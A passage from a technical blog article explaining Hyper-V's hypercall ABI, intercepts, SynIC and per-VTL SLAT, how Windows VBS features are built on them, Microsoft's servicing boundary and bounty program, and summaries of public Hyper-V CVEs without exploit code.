&lt;p&gt;A guest VM does I/O over the VMBus. A network packet, for example, travels from the guest application down to the guest&apos;s Windows NDIS stack; through the synthetic NIC miniport driver (the VSC) in the guest&apos;s kernel; over the VMBus message channel; into the network VSP in the root partition; into the root&apos;s real NDIS stack; into the physical NIC driver; out the wire. The hypervisor&apos;s role in this chain is structural: it owns the VMBus message channel, the SynIC interrupts that notify the VSP and VSC of new traffic, and the per-partition SLAT mappings that decide which bytes either side can read.&lt;/p&gt;
&lt;p&gt;The architectural implication is that &lt;em&gt;device emulation lives in the root partition, not in the hypervisor binary&lt;/em&gt;. The TCB the hypervisor binary itself has to protect is narrow. The TCB the root partition&apos;s drivers have to protect is much wider -- but those drivers live in normal Windows kernel mode, where Microsoft has thirty years of tooling. This is why almost every public Hyper-V CVE since 2018 has landed in &lt;code&gt;vmswitch.sys&lt;/code&gt;, &lt;code&gt;storvsp.sys&lt;/code&gt;, or the NT Kernel Integration VSP, rather than in &lt;code&gt;hvix64.exe&lt;/code&gt; itself.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Putting device emulation in the root partition means the hypervisor binary does not need to parse Ethernet frames, SCSI commands, USB descriptors, or graphics-adapter command rings. The trade-off is that the root partition becomes part of the TCB -- a root-partition kernel-mode bug is a hypervisor-equivalent break -- but the small hypervisor binary itself can be reviewed, fuzzed, and reasoned about as a single piece of code.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;7.2 The hypercall ABI&lt;/h3&gt;
&lt;p&gt;Hypercalls are how partitions request services from the hypervisor. The TLFS documents two flavors. A &lt;em&gt;fast&lt;/em&gt; hypercall passes its parameters inline in CPU registers: on x64, &lt;code&gt;rcx&lt;/code&gt; carries a 64-bit hypercall input value (the low 16 bits are the call code; the upper 48 bits are a control word with fields for the Fast flag, variable-header size, Rep Count, and Rep Start Index), &lt;code&gt;rdx&lt;/code&gt; carries the first input parameter, and &lt;code&gt;r8&lt;/code&gt; carries the second. A &lt;em&gt;slow&lt;/em&gt; hypercall instead passes the GPA (guest physical address) of an input-parameter page in &lt;code&gt;rdx&lt;/code&gt;, and the GPA of an output-parameter page in &lt;code&gt;r8&lt;/code&gt;; the actual parameter content lives in those pages. The instruction that triggers the hypercall is &lt;code&gt;vmcall&lt;/code&gt; on Intel and &lt;code&gt;vmmcall&lt;/code&gt; on AMD; the hypervisor maps both onto the same internal entry point [@ms-tlfs-pdf].&lt;/p&gt;

A guest-to-hypervisor call. The guest issues `vmcall` (Intel) or `vmmcall` (AMD); the CPU traps via VM-EXIT into the hypervisor in VMX root mode; the hypervisor reads the call code from `rcx`, reads the inputs from registers (fast) or from a GPA-pointed page (slow), services the request, writes outputs back, and returns via VM-ENTRY. Hypercalls are the only legitimate way for a partition to invoke hypervisor services [@ms-tlfs-pdf].
&lt;p&gt;{&lt;code&gt;// A JavaScript model of the rcx hypercall input value layout. // In a real hypercall the guest sets rcx, rdx, r8 and issues vmcall / vmmcall. function packHypercallInput({ callCode, fastFlag, varHeaderSize, isNested, repCount, repStartIdx }) {   // rcx layout (TLFS section 3 &quot;Hypercall Interface&quot;, verbatim bit map)   //   bits  0..15  Call Code   //   bit      16  Fast (1 = inline params in rdx/r8)   //   bits 17..26  Variable header size (in QWORDs)   //   bits 27..30  RsvdZ   //   bit      31  Is Nested   //   bits 32..43  Rep Count   //   bits 44..47  RsvdZ   //   bits 48..59  Rep Start Index   //   bits 60..63  RsvdZ   let rcx = 0n;   rcx |= BigInt(callCode) &amp;amp; 0xFFFFn;   if (fastFlag) rcx |= 1n &amp;lt;&amp;lt; 16n;   rcx |= (BigInt(varHeaderSize) &amp;amp; 0x3FFn) &amp;lt;&amp;lt; 17n;   if (isNested) rcx |= 1n &amp;lt;&amp;lt; 31n;   rcx |= (BigInt(repCount) &amp;amp; 0xFFFn) &amp;lt;&amp;lt; 32n;   rcx |= (BigInt(repStartIdx) &amp;amp; 0xFFFn) &amp;lt;&amp;lt; 48n;   return rcx; } // HvCallPostMessage = 0x005C, fast hypercall (TLFS section 11) const rcx = packHypercallInput({   callCode: 0x005C,   fastFlag: 1,   varHeaderSize: 0,   isNested: 0,   repCount: 0,   repStartIdx: 0, }); console.log(&apos;rcx = 0x&apos; + rcx.toString(16).padStart(16, &apos;0&apos;)); // Output: rcx = 0x000000000001005c&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;The call-code space is small and well-documented: a few hundred codes, each one a structured request with typed inputs and outputs. The hypercall path is also where the most consequential 2024 Hyper-V CVE lived. CVE-2024-21407 was a use-after-free in &lt;code&gt;hvix64.exe&lt;/code&gt;&apos;s handling of a specific file-operation hypercall, the rare case where the bug was in the hypervisor binary itself rather than in a root-partition driver [@nvd-cve-2024-21407].&lt;/p&gt;
&lt;h3&gt;7.3 Intercepts&lt;/h3&gt;
&lt;p&gt;Intercepts are how the hypervisor virtualizes guest behavior. The TLFS distinguishes four categories: &lt;em&gt;instruction&lt;/em&gt; intercepts (&lt;code&gt;CPUID&lt;/code&gt;, MSR reads/writes, I/O-port instructions), &lt;em&gt;exception&lt;/em&gt; intercepts (page faults, general protection faults), &lt;em&gt;memory-access&lt;/em&gt; intercepts (a guest tries to read or write a specific guest-physical-address region), and &lt;em&gt;partition-state&lt;/em&gt; intercepts (a guest hits a state that the hypervisor wants to be notified about). Each is configured per-partition through the Intel VMCS execution-control bits or the AMD VMCB control fields [@ms-tlfs-pdf].&lt;/p&gt;

A configurable hypervisor notification on a specific guest event. The hypervisor programs the VMCS or VMCB to fire a VM-EXIT when the guest issues a particular instruction, raises a particular exception, accesses a particular memory region, or transitions to a particular state. Intercepts are the policy mechanism that lets the hypervisor implement device emulation, security checks, and VTL transitions [@ms-tlfs-pdf].
&lt;p&gt;For VBS, the load-bearing intercept is the memory-access intercept. When VTL0 code tries to access a region whose VTL0 SLAT mapping is unreadable or unwritable, the access traps to the hypervisor with the offending GPA; the hypervisor can deliver the intercept to the VTL1 Secure Kernel as a &lt;em&gt;secure call&lt;/em&gt;, letting VTL1 see what VTL0 was trying to do and decide whether to allow it. This is how HVCI&apos;s W^X enforcement is wired: a VTL0 page that is marked writable in VTL0&apos;s SLAT is marked non-executable in the same SLAT; an attempt to switch the same page to executable becomes a memory-access intercept that VTL1 must approve.&lt;/p&gt;
&lt;h3&gt;7.4 The Synthetic Interrupt Controller (SynIC)&lt;/h3&gt;
&lt;p&gt;The Synthetic Interrupt Controller, SynIC, is the hypervisor&apos;s per-virtual-processor event delivery surface. Each VP has 16 Synthetic Interrupt Source (SINT) lines, a message page (where the hypervisor places message-shaped events), an event-flag page (where it places bit-flag events), and a set of synthetic timers. SynIC is the signaling surface VMBus uses to notify endpoints; the VMBus payload itself moves through shared-memory ring buffers. SynIC also delivers VTL transitions between VTL0 and VTL1 inside the root partition [@ms-tlfs-pdf].&lt;/p&gt;

A hypervisor-emulated interrupt controller, parallel to the hardware APIC, that delivers hypervisor-originated events to a virtual processor. Each VP has 16 SINT lines, a message page, an event-flag page, and synthetic timers. VMBus signaling rides on SynIC; secure-call delivery between VTL0 and VTL1 rides on SynIC; vTPM, virtual-PCI, and other paravirtualized device events ride on SynIC [@ms-tlfs-pdf].
&lt;p&gt;For VBS, the secure-call ABI -- the way VTL0 code asks VTL1 to do something -- is built on SynIC. A VTL0 caller writes a request into a shared message page, signals a SINT, and yields the CPU; the hypervisor switches SLAT context to VTL1, delivers the message, and lets VTL1 read the request. When VTL1 finishes, it signals a SINT back to VTL0 and the hypervisor switches contexts again. Credential Guard&apos;s whole communication path between VTL0 LSASS and VTL1 LSAISO is one of these secure-call channels.&lt;/p&gt;
&lt;h3&gt;7.5 Memory and per-VTL SLAT&lt;/h3&gt;
&lt;p&gt;The last surface is also the most important: memory. Guest physical addresses (GPAs) are translated to system physical addresses (SPAs) by per-partition SLAT page tables. The hypervisor has exclusive control of these tables; no partition, including the root, can read or modify them directly. For VBS specifically, the hypervisor maintains &lt;em&gt;two&lt;/em&gt; SLAT mappings per partition -- one for VTL0 and one for VTL1 -- and switches between them on VTL transitions.&lt;/p&gt;

flowchart LR
    GPA[&quot;Guest physical address (GPA)&quot;]
    SLAT0[&quot;VTL0 SLAT mapping&quot;]
    SLAT1[&quot;VTL1 SLAT mapping&quot;]
    SPA[&quot;System physical address (SPA)&quot;]
    HV[&quot;Hypervisor (owns both SLAT trees)&quot;]
    GPA --&amp;gt;|VTL0 active| SLAT0
    GPA --&amp;gt;|VTL1 active| SLAT1
    SLAT0 --&amp;gt;|&quot;normal pages&quot;| SPA
    SLAT1 --&amp;gt;|&quot;secret pages, +rwx&quot;| SPA
    SLAT0 -.-&amp;gt;|&quot;VTL1 secret pages: not present&quot;| SPA
    HV -.-&amp;gt;|&quot;switches context on VTL transition&quot;| SLAT0
    HV -.-&amp;gt;|&quot;switches context on VTL transition&quot;| SLAT1
&lt;p&gt;This is the architectural reason VTL0 kernel mode, even with full Ring-0 code execution, cannot read or execute VTL1 memory. The VTL0 page-table walker on a load from a VTL1-only page does not see the page at all; the SLAT walker on the host returns &lt;em&gt;no mapping&lt;/em&gt;; the hardware MMU raises an EPT/NPT violation; the hypervisor handles the violation according to the VTL0 partition&apos;s intercept policy. In the security-relevant case, the hypervisor delivers an access-denied result to VTL0 and continues. There is no kernel-mode &lt;code&gt;mov&lt;/code&gt; instruction sequence that can defeat this, because the gating happens in hardware page-table walks that VTL0 kernel mode cannot influence.&lt;/p&gt;
&lt;p&gt;Five surfaces. Two of them -- the hypercall ABI and the device-emulation paths that surface over VMBus -- are where every public Hyper-V escape since 2018 has lived. The other three (intercepts, SynIC, per-VTL SLAT) are the substrate on which VBS, HVCI, Credential Guard, and System Guard Secure Launch are built. We turn to those next.&lt;/p&gt;
&lt;h2&gt;8. How the Hypervisor Enforces Each VBS Feature&lt;/h2&gt;
&lt;p&gt;The hypervisor itself does not know anything about credentials, code signing, application allowlisting, or DMA protection. It knows about partitions, VTLs, intercepts, SLAT entries, and hypercalls. Each Windows security feature is built by &lt;em&gt;composing&lt;/em&gt; those primitives in a specific way. The mapping is precise and worth walking, because it is what makes the substrate a &lt;em&gt;security&lt;/em&gt; primitive rather than just a virtualization product [@ms-hardware-root-of-trust].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HVCI / Memory Integrity.&lt;/strong&gt; &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Hypervisor-protected Code Integrity&lt;/a&gt; is the most consequential VBS feature on a per-byte basis: it changes Windows from a system that lets the kernel execute any signed driver to one where the kernel cannot execute &lt;em&gt;any&lt;/em&gt; page until VTL1 has approved it. VTL1&apos;s code-integrity service inspects every kernel-mode page mapping change request before the SLAT entry that would make the page executable in VTL0 is granted. The W^X invariant -- a single page can be writable or executable, but never both -- is enforced not by NT kernel cooperation but by the per-VTL SLAT, exactly as described in section 7.5. An NT-kernel attempt to mark a writable page executable becomes a memory-access intercept that VTL1&apos;s CI service evaluates [@ms-enable-vbs-hvci]. The hypervisor primitives composed: per-VTL SLAT + memory-access intercepts + secure-call ABI.&lt;/p&gt;

A user-mode process that runs inside VTL1&apos;s Isolated User Mode (IUM). Trustlets must be signed with the Windows System Component Verification certificate (Signature Level 12) and carry the IUM EKU `1.3.6.1.4.1.311.10.3.37`. The shipping inbox trustlets include `LSAISO.EXE` (Credential Guard), `VMSP.EXE` (host side of virtual TPM), and the vTPM provisioning trustlet [@ms-iso-user-mode-trustlets, @ionescu-bh-2015].
&lt;p&gt;&lt;strong&gt;Credential Guard.&lt;/strong&gt; &lt;code&gt;LSAISO.EXE&lt;/code&gt; -- the LSA-Isolated trustlet -- runs in VTL1 Isolated User Mode. NTLM password hashes and Kerberos Ticket-Granting Tickets that LSASS used to keep in normal VTL0 memory are moved to VTL1 memory that VTL0 cannot read. VTL0 LSASS performs credential operations by sending a request to LSAISO over a secure-call channel mediated by the hypervisor&apos;s SynIC; LSAISO does the cryptographic work and returns a result. The plaintext of the credential never leaves VTL1. This is why a Ring-0 attacker on a Credential Guard-enabled Windows install cannot dump LSASS hashes -- they aren&apos;t in LSASS [@ms-iso-user-mode-trustlets]. The hypervisor primitives composed: per-VTL SLAT (to hide LSAISO&apos;s memory) + SynIC (to deliver secure calls) + intercepts (to catch VTL0 attempts to access LSAISO memory). See the sibling &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;Credential Guard / NTLMless&lt;/a&gt; article for VTL1 internals.&lt;/p&gt;

The VTL0-to-VTL1 calling convention. A VTL0 caller fills in a shared parameter page, signals a SynIC interrupt configured for VTL transition, and yields. The hypervisor switches SLAT context to VTL1, delivers the message, and lets the Secure Kernel dispatch it via `IumInvokeSecureService` to a registered VTL1 service. On return, the hypervisor switches contexts back. The whole round-trip is mediated by hypervisor primitives the calling VTL cannot bypass [@ionescu-bh-2015].
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;Application Control (WDAC)&lt;/a&gt;.&lt;/strong&gt; The same VTL1 code-integrity service that backs HVCI also evaluates user-mode policy. When VTL0 user mode tries to load a binary that is restricted by WDAC policy, the load becomes a secure call into VTL1; VTL1&apos;s policy engine evaluates the signature, the certificate chain, and the configured policy; the secure call returns approval or denial. WDAC policy lives in VTL1, the policy database lives in VTL1, and a VTL0 administrator who has been compromised cannot edit either. The hypervisor primitives composed: same as HVCI, plus a richer secure-call API for policy evaluation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;VBS Enclaves.&lt;/strong&gt; A third-party application can load native code into a VTL1 IUM enclave. The enclave executes in VTL1, with its memory hidden from VTL0; the application talks to the enclave through a secure-call ABI exposed by the Secure Kernel. Architecturally parallel to Credential Guard but available to ordinary application developers. The hypervisor primitives composed: per-VTL SLAT (to hide enclave memory) + secure-call ABI (to invoke enclave code) + a Secure Kernel API for enclave creation, attestation, and destruction.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;System Guard Secure Launch (DRTM).&lt;/strong&gt; Intel TXT&apos;s &lt;code&gt;SENTER&lt;/code&gt; instruction (and AMD&apos;s &lt;code&gt;SKINIT&lt;/code&gt; on AMD platforms) executes a hardware-rooted dynamic measurement of the hypervisor and the Secure Kernel into TPM PCRs 17-22 &lt;em&gt;after&lt;/em&gt; firmware initialization [@ms-system-guard-secure-launch]. This re-establishes the trust root post-firmware: a pre-boot firmware compromise that survived UEFI Secure Boot cannot silently poison the hypervisor&apos;s launch state without showing up as an unexpected measurement in a PCR that VTL1 can read. The hypervisor primitives composed: DRTM event registration with the hardware + TPM PCR extension + a VTL1-side attestation API. See the sibling &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; article for the static-RTM half of the same story.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kernel DMA Protection.&lt;/strong&gt; External devices over Thunderbolt, USB4, or hot-plug PCIe can issue DMA to arbitrary physical addresses, bypassing the CPU&apos;s MMU entirely. The hypervisor configures the IOMMU (Intel VT-d / AMD-Vi) to deny DMA from externally-attached devices outside of explicitly-authorized memory regions, and to refuse DMA from any device before its kernel-mode driver has been loaded under a trusted policy [@ms-kernel-dma-protection]. The hypervisor primitives composed: hypervisor-owned IOMMU configuration + memory-access intercepts on the IOMMU configuration MMIO region.&lt;/p&gt;
&lt;p&gt;The shape of the table is the point.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Composed primitives&lt;/th&gt;
&lt;th&gt;Verbatim hypervisor mechanism&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;HVCI&lt;/td&gt;
&lt;td&gt;per-VTL SLAT + memory-access intercepts + secure-call ABI&lt;/td&gt;
&lt;td&gt;VTL1 vets each VTL0 page-mapping change before granting +X&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Guard&lt;/td&gt;
&lt;td&gt;per-VTL SLAT + SynIC + intercepts&lt;/td&gt;
&lt;td&gt;LSAISO trustlet memory absent from VTL0 SLAT mapping&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WDAC (AppControl)&lt;/td&gt;
&lt;td&gt;secure-call ABI + VTL1 policy engine&lt;/td&gt;
&lt;td&gt;VTL0 binary load = secure call into VTL1 CI service&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VBS Enclaves&lt;/td&gt;
&lt;td&gt;per-VTL SLAT + secure-call ABI&lt;/td&gt;
&lt;td&gt;Third-party VTL1 IUM enclave invoked over secure call&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Guard Secure Launch&lt;/td&gt;
&lt;td&gt;hardware DRTM (TXT/SKINIT) + TPM PCR extension&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SENTER&lt;/code&gt; / &lt;code&gt;SKINIT&lt;/code&gt; measures hypervisor into PCRs 17-22&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel DMA Protection&lt;/td&gt;
&lt;td&gt;hypervisor-owned IOMMU + MMIO intercepts&lt;/td&gt;
&lt;td&gt;VT-d/AMD-Vi denies DMA outside authorized regions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The hypervisor knows nothing about NTLM hashes, Kerberos tickets, code-signing certificates, WDAC policy XML, or DMA-region authorization. All of that policy lives in VTL1 -- in the Secure Kernel, in LSAISO, in the WDAC service. The hypervisor only provides the *mechanism* for one piece of policy to evaluate a request from another piece of policy in isolation. This is the architectural separation that lets the hypervisor binary stay small and the Windows-side security feature set keep growing.
&lt;p&gt;The pattern: each feature is a different &lt;em&gt;composition&lt;/em&gt; of the same five primitives (partitions, hypercalls, intercepts, SynIC, per-VTL SLAT). The hypervisor is genuinely a primitive in the formal sense -- a small set of mechanisms that compose into many security policies. If the hypervisor is the mechanism, the &lt;em&gt;boundary&lt;/em&gt; the hypervisor enforces is the contract. Microsoft commits to servicing certain attacks against that boundary and explicitly excludes others. To know what we are getting, we need to read the contract.&lt;/p&gt;
&lt;h2&gt;9. The Security Boundary Microsoft Commits To&lt;/h2&gt;
&lt;p&gt;The Microsoft Security Servicing Criteria for Windows is a public document. It enumerates which classes of attack Microsoft will issue a CVE and an out-of-band patch for, and which it will not. For the hypervisor, the document is unusually specific [@ms-msrc-servicing-criteria].&lt;/p&gt;
&lt;p&gt;The two relevant boundaries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Hypervisor / virtualization boundary.&lt;/strong&gt; An L1-guest-to-host or guest-to-guest break is a serviced boundary. If a guest VM can execute code in the root partition or in another guest&apos;s address space, Microsoft will issue a CVE.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Virtual Secure Mode (VBS) boundary.&lt;/strong&gt; VTL0 kernel-mode code reading or writing VTL1 memory, or executing VTL1 code, is a serviced break. If a Ring-0 attacker in VTL0 can defeat the per-VTL SLAT, Microsoft will issue a CVE.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What the servicing criteria &lt;em&gt;does not&lt;/em&gt; commit to is also worth naming. A same-VTL elevation of privilege inside a guest (a guest user becoming guest SYSTEM) is not a hypervisor break -- it is a Windows EoP, serviced under the Windows kernel boundary, not the hypervisor boundary. A denial-of-service of the host from a guest is generally not a serviced hypervisor break unless it produces a memory corruption that an attacker can ride to RCE. An administrator in the root partition reading guest memory is not a break at all -- the root partition is part of the hypervisor&apos;s TCB by definition, and root-partition admin is hypervisor-admin in the threat model.&lt;/p&gt;
&lt;p&gt;The dollar figures for these boundaries are documented in the Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]. The program ranges from $5,000 for the lowest-impact qualifying submission up to $250,000 for the highest. The eligibility language is verbatim:&lt;/p&gt;

An eligible submission includes a Remote Code Execution (RCE) vulnerability in Microsoft Hyper-V that enables a L1 guest virtual machine to compromise the hypervisor, escape from the guest virtual machine to the host, or escape to another L1 guest virtual machine. -- Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]
&lt;p&gt;$250,000 is the highest standing Hyper-V bounty in the industry. Comparable programs from the other major hypervisor vendors do not publish the same calibration. KVM is a community project with no vendor-paid bounty pool of equivalent size. Xen is a Linux Foundation project that runs a bug bounty through HackerOne but does not publicly attach a $250,000 figure to a guest-to-host RCE. ESXi (Broadcom) does not publish a standing bounty program with a per-bug ceiling; bounty payments for ESXi RCEs typically flow through Pwn2Own and similar marketplaces, where Trend Micro&apos;s Zero Day Initiative sets the prize for any given competition.The bounty calibration is itself a data point. If $250,000 were too high, Microsoft would be drowning in submissions; if it were too low, the public CVE record would show more hypervisor breaks reported through Pwn2Own than directly to MSRC. The current equilibrium -- two to four Microsoft-direct Hyper-V CVEs per year, plus zero Pwn2Own Hyper-V guest-to-host escapes through Pwn2Own Berlin 2025 [@zdi-pwn2own-day3] -- is consistent with the bounty being calibrated roughly correctly relative to the cost of finding a real bug.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Hypervisor&lt;/th&gt;
&lt;th&gt;Published bounty&lt;/th&gt;
&lt;th&gt;Ceiling&lt;/th&gt;
&lt;th&gt;Servicing-criteria boundary published&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Microsoft&lt;/td&gt;
&lt;td&gt;Hyper-V / &lt;code&gt;hvix64.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;$250,000&lt;/td&gt;
&lt;td&gt;Yes, verbatim language&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Xen Project&lt;/td&gt;
&lt;td&gt;Xen&lt;/td&gt;
&lt;td&gt;Yes (HackerOne)&lt;/td&gt;
&lt;td&gt;Lower, varies&lt;/td&gt;
&lt;td&gt;Yes, security policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KVM&lt;/td&gt;
&lt;td&gt;KVM (community)&lt;/td&gt;
&lt;td&gt;No standing program&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;No vendor-published criteria&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Broadcom/VMware&lt;/td&gt;
&lt;td&gt;ESXi&lt;/td&gt;
&lt;td&gt;No standing public bounty&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Vendor advisories per CVE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;seL4 Project&lt;/td&gt;
&lt;td&gt;seL4&lt;/td&gt;
&lt;td&gt;No (proof-rooted argument)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Functional-correctness proof [@sel4-whitepaper]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The seL4 row is included because seL4 is the only hypervisor in the table whose claim to a security boundary is &lt;em&gt;mathematical&lt;/em&gt; rather than operational. seL4 ships approximately ten thousand lines of C and assembly with a machine-checked proof of functional correctness against a higher-level specification. The proof took roughly twenty-five person-years and covers a microkernel that does not by itself ship the full surface area of Hyper-V. The Microsoft hypervisor is unverified at the §7-estimated line count an order of magnitude larger; its security argument is operational (a small TCB, heavy fuzzing, a standing bounty, public servicing) rather than mathematical.&lt;/p&gt;
&lt;p&gt;A serviced boundary is a contract. Contracts are not promises; they are obligations that come due when an attacker finds a way around them. To see what the contract has actually had to pay out, we read the public CVE record.&lt;/p&gt;
&lt;h2&gt;10. The Public Track Record -- Six Worked CVEs Across Three Classes&lt;/h2&gt;
&lt;p&gt;We do not need an exhaustive Hyper-V CVE catalog to understand the boundary&apos;s real shape. Six worked examples, drawn from three distinct attack classes, cover every public failure mode the boundary has produced since 2018. We walk them in order.&lt;/p&gt;
&lt;h3&gt;Class A: Device emulation in the root partition&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;CVE-2021-28476 (vmswitch.sys, May 2021, CVSS 9.9).&lt;/strong&gt; Discovered by Ophir Harpaz at Guardicore Labs and Peleg Hadar at SafeBreach Labs using Guardicore&apos;s &lt;code&gt;hAFL1&lt;/code&gt; hypervisor fuzzer, this was a guest-controlled &lt;code&gt;OID_SWITCH_NIC_REQUEST&lt;/code&gt; OID parameter passed to the host-side &lt;code&gt;vmswitch.sys&lt;/code&gt; driver. The driver dereferenced an attacker-influenced object pointer; the host kernel performed an arbitrary pointer dereference, which MSRC rated as guest-to-host RCE in the root partition&apos;s kernel mode (the demonstrated primitive was an arbitrary host-kernel read/dereference). The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects guest-to-host RCE with Azure-scale blast radius: the bug was reachable from the vmswitch driver shipped in Windows builds well before the May 2021 patch, per the Guardicore Labs technical analysis [@nvd-cve-2021-28476]. The bug is the canonical anchor for &quot;device emulation in the root partition is the largest Hyper-V attack surface.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CVE-2025-21333 (NT Kernel Integration VSP, January 2025, CWE-122).&lt;/strong&gt; The first publicly-acknowledged in-the-wild exploited Hyper-V CVE. The &quot;Hyper-V NT Kernel Integration VSP&quot; is a relatively new component that ties the Windows kernel-mode container architecture to Hyper-V&apos;s VSP/VSC pattern. A guest-controlled input triggered a heap-based buffer overflow on the host side of the integration; the host&apos;s address space was corruptible from a guest [@nvd-cve-2025-21333]. The operational pattern matches the vmswitch family: a host-side component receives structured, attacker-shaped input from a guest, and the host-side component overflows.&lt;/p&gt;
&lt;h3&gt;Class B: The hypercall input-validation path&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;CVE-2024-21407 (Hyper-V hypercall UAF, March 2024, CVSS 8.1, CWE-416).&lt;/strong&gt; The rare case where the bug is in &lt;code&gt;hvix64.exe&lt;/code&gt; / &lt;code&gt;hvax64.exe&lt;/code&gt; itself, not in a root-partition driver. A guest crafted specially-formed file-operation hypercalls; the hypervisor dereferenced freed memory; the guest gained arbitrary host code execution [@nvd-cve-2024-21407].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CVE-2024-30092 (Hyper-V RCE, October 2024, CWE-20 + CWE-829).&lt;/strong&gt; A Hyper-V remote code execution that combined improper input validation with inclusion of functionality from an untrusted control sphere -- another hypercall-path-class bug [@nvd-cve-2024-30092].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CVE-2024-49117 (Hyper-V RCE, December 2024, CVSS 8.8).&lt;/strong&gt; A third 2024 Hyper-V RCE; the December Patch Tuesday entry rounded out a year in which three publicly-disclosed Hyper-V RCEs landed in twelve months, the most since the 2018 vmswitch family [@nvd-cve-2024-49117].&lt;/p&gt;
&lt;h3&gt;Class C: VTL0-to-VTL1 (the VBS break, not the hypervisor break)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;CVE-2020-0917 and CVE-2020-0918 -- Amar and King, Black Hat USA 2020.&lt;/strong&gt; Saar Amar and Daniel King&apos;s &quot;Breaking VSM by Attacking SecureKernel&quot; disclosed two paired vulnerabilities discovered with their Hyperseed hypercall fuzzer retargeted at &lt;code&gt;securekernel!IumInvokeSecureService&lt;/code&gt;, the secure-call entry point. Vulnerability #1 -- which maps to CVE-2020-0917 -- is an &lt;em&gt;out-of-bounds write&lt;/em&gt; in &lt;code&gt;securekernel!SkmmObtainHotPatchUndoTable&lt;/code&gt;, the function that parses the hot-patch undo table at secure-call invocation time.The Black Hat USA 2020 deck (verified via pdftotext at the canonical MSRC-Security-Research GitHub URL) explicitly labels Vulnerability #1 as &lt;strong&gt;OOB Write&lt;/strong&gt;, in slides titled &quot;The Vulnerable Function&quot; and &quot;The OOB&quot; in the &quot;Hardening SK&quot; section [@amar-king-bh-2020]. Several secondary writeups across the web have transcribed the bug class as &quot;OOB read,&quot; which is incorrect; the deck itself is the primary source and says write. The functions involved are also commonly conflated: &lt;code&gt;IumInvokeSecureService&lt;/code&gt; is the secure-call dispatcher Hyperseed retargets to reach the buggy code; the actual bug is in &lt;code&gt;SkmmObtainHotPatchUndoTable&lt;/code&gt;. The NVD entries for both CVEs are tracked as CWE-269 (Improper Privilege Management). Vulnerability #2 -- CVE-2020-0918 -- is a design flaw in &lt;code&gt;SkmmUnmapMdl&lt;/code&gt; that lets VTL0 pass a fully attacker-controlled Memory Descriptor List to &lt;code&gt;SkmiReleaseUnknownPTEs&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The Microsoft response is documented end-to-end in the same deck: the Secure Kernel pool was migrated to segment heap in mid-2019, four W+X regions were reduced to +X only, and &lt;code&gt;SkpgContext&lt;/code&gt; -- a HyperGuard equivalent for Secure Kernel -- was introduced.&lt;/p&gt;
&lt;p&gt;This is a different failure class than vmswitch RCE: not guest-to-host, but VTL0-to-VTL1 -- a Secure Kernel break reached through the hypervisor&apos;s secure-call dispatch from a privileged VTL0 attacker. Microsoft services it under the VBS / VSM boundary in the servicing criteria document, even though no guest VM is involved.&lt;/p&gt;
&lt;blockquote&gt;
